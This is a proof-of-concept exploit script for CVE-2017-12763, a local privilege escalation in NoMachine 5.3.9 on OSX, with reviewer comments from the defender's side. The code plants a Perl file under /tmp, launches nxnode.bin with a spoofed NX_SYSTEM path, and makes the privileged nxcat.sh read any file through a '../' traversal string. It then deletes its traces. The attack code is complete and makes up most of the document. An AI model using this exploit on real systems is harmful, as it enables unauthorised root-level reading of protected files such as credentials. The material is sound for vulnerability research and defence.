"""
# Exploit Title: NoMachine LPE - Local Privilege Escalation
# Date: 09/08/2017
# Exploit Author: Daniele Linguaglossa
# Vendor Homepage: https://www.nomachine.com
# Software Link: https://www.nomachine.com
# Version: 5.3.9
# Tested on: OSX
# CVE : CVE-2017-12763

NoMachine uses a file called nxexec to execute various actions as the super user. nxexec allows
sh files within a sandboxed path to be executed; additionally, other checks, such as the parent process name and
parent process path, are performed to make sure that only NoMachine applications are allowed to execute nxexec.
nxnode.bin allows a local path to be spoofed via the NX_SYSTEM environment variable, which is used to craft a path
where a Perl file will be executed. This PoC exploits the NX_SYSTEM variable to allow a custom Perl file to call
nxexec and execute the privileged nxcat.sh script in order to read any file on the filesystem.
"""
import os
import sys

# Proof-of-concept for CVE-2017-12763 (NoMachine 5.3.9, tested by the author
# on OSX). Reviewer notes, written from the defender's side:
#   * Root cause, per the advisory text in the module docstring: nxnode.bin
#     takes its base path from the caller-controlled NX_SYSTEM environment
#     variable, so the Perl file it runs can come from a directory that any
#     local user can write to. A privileged helper chain should not derive
#     code search paths from the caller's environment.
#   * Artefacts while this runs: the directory /tmp/lib/perl/nxnode, the file
#     nxnode.pl inside it, and an nxnode process started with NX_SYSTEM=/tmp.
#     The script deletes /tmp/lib when it finishes, so file-creation and
#     process-environment telemetry record this; later disk inspection does
#     not.
#   * The page names no fixed release; consult the vendor advisory for
#     CVE-2017-12763 for the patched version.

# Single-argument print(...) behaves the same as the print statement under
# Python 2, which is what this listing was written for.
print("[!] NoMachine - EoP - Read any file by @dzonerzy")

if len(sys.argv) != 4:
    print("Usage: {0} <path of nxnode.bin> <path of nxexec> <file to read>".format(sys.argv[0]))
else:
    nxnode_bin, nxexec_bin, target_file = sys.argv[1:4]
    # Read from the environment without a fallback: an unset USER is
    # formatted into the command as the text "None".
    login_name = os.environ.get("USER")
    stage_dir = "/tmp/lib/perl/nxnode"
    stage_script = "/tmp/lib/perl/nxnode/nxnode.pl"

    # The requested path is appended to a run of "../" components and handed
    # to the privileged nxcat.sh through nxexec. The missing control is
    # presumably path canonicalisation/containment inside nxcat.sh -- that
    # script is not shown here, so confirm against the vendor fix.
    perl_template = (
        "print \"[*] Exploiting vulnerability\\n\";"
        "system(\"{0} "
        "nxcat.sh 1 {1} 2 '../../../../../..{2}'\");"
    )
    perl_source = perl_template.format(nxexec_bin, login_name, target_file)

    print("[*] Crafting tmp environment")
    os.system("mkdir -p {0}".format(stage_dir))
    # The context manager closes the file; no explicit close() is needed.
    with open(stage_script, "w") as handle:
        handle.write(perl_source)

    # nxnode is started with NX_SYSTEM pointing at /tmp, the parent of the
    # lib/perl/nxnode tree created above.
    os.system("NX_SYSTEM=/tmp {0}".format(nxnode_bin))

    # Cleanup of everything created under /tmp/lib.
    os.unlink(stage_script)
    os.system("rm -r /tmp/lib")